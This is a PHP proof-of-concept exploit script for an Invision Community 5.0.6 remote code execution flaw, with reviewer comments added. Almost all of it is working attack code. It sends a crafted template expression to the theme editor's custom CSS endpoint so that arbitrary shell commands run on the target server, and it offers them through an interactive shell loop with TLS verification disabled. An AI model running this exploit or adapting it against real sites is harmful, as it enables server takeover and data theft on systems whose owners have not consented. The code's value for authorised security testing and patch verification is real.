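<?php
/*
 ---------------------------------------------------------------------------
 Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE)
 ---------------------------------------------------------------------------

 author..............: Egidio Romano aka EgiX
 mail................: n0b0d13s[at]gmail[dot]com
 software link.......: https://invisioncommunity.com

 +-------------------------------------------------------------------------+
 | This proof of concept code was written for educational purpose only.    |
 | Use it at your own risk. Author will be not responsible for any damage. |
 +-------------------------------------------------------------------------+

 [-] Original Advisory:
 https://karmainsecurity.com/KIS-2025-02

 Reviewer notes:
  - The script POSTs app=core&module=system&controller=themeeditor&do=customCss
    to the supplied URL with a `content` value of the form
    {expression="die('________'.system(...))"}. Per the linked advisory the
    server evaluates that template tag, so each command runs on the target
    under the web-server user. Only use against systems you are authorised
    to test.
  - TLS certificate verification is disabled (VERIFYPEER/VERIFYHOST false),
    which makes the session trivially interceptable on the wire. It is kept
    to match the original PoC (self-signed lab targets), not as a good
    default; remove those two lines when testing over untrusted networks.
  - The command is base64-encoded client-side and decoded inside the payload
    so shell metacharacters never pass through the URL-encoding or template
    layers unescaped.
  - The '________' marker lets the client cut the command output out of the
    page; die() truncates everything after it. system() also returns the last
    output line, which therefore appears once more after the marker and is
    discarded by the greedy match.
*/

set_time_limit(0);
// Warnings are silenced as in the original PoC; transport failures are
// reported explicitly below instead of relying on PHP notices.
error_reporting(E_ERROR);

print "\n+-------------------------------------------------------------------+";
print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2) {
    print "\nUsage......: php $argv[0] <URL>\n";
    print "\nExample....: php $argv[0] http://localhost/invision/";
    print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
    die();
}

$ch = curl_init();

// Routing parameters of the vulnerable endpoint; `content` is set per command.
$params = [
    "app"        => "core",
    "module"     => "system",
    "controller" => "themeeditor",
    "do"         => "customCss",
];

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// NOTE(review): certificate checks intentionally off, see header comment.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

while (1) {
    print "\ninvision-shell# ";

    $line = fgets(STDIN);
    // On EOF (Ctrl-D or a closed pipe) fgets() returns false; the original
    // looped forever posting empty commands to the target. Stop cleanly.
    if ($line === false) break;

    $cmd = trim($line);
    if ($cmd === "exit") break;
    // A bare Enter would otherwise send a useless request to the target.
    if ($cmd === "") continue;

    // Payload format must stay byte-identical: the marker and the
    // base64_decode() wrapper are what the response parser relies on.
    $params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

    $response = curl_exec($ch);
    if ($response === false) {
        // Transport-level failure (DNS, connect, TLS handshake) - distinct
        // from a target that simply did not evaluate the expression.
        die("\n[-] Request failed: " . curl_error($ch) . "\n\n");
    }

    // No marker in the page means the expression was not evaluated:
    // patched/unaffected version, a WAF, or the wrong base URL.
    if (!preg_match("/(.*)________/s", $response, $m)) {
        die("\n[-] Exploit failed!\n\n");
    }

    print $m[1];
}

curl_close($ch);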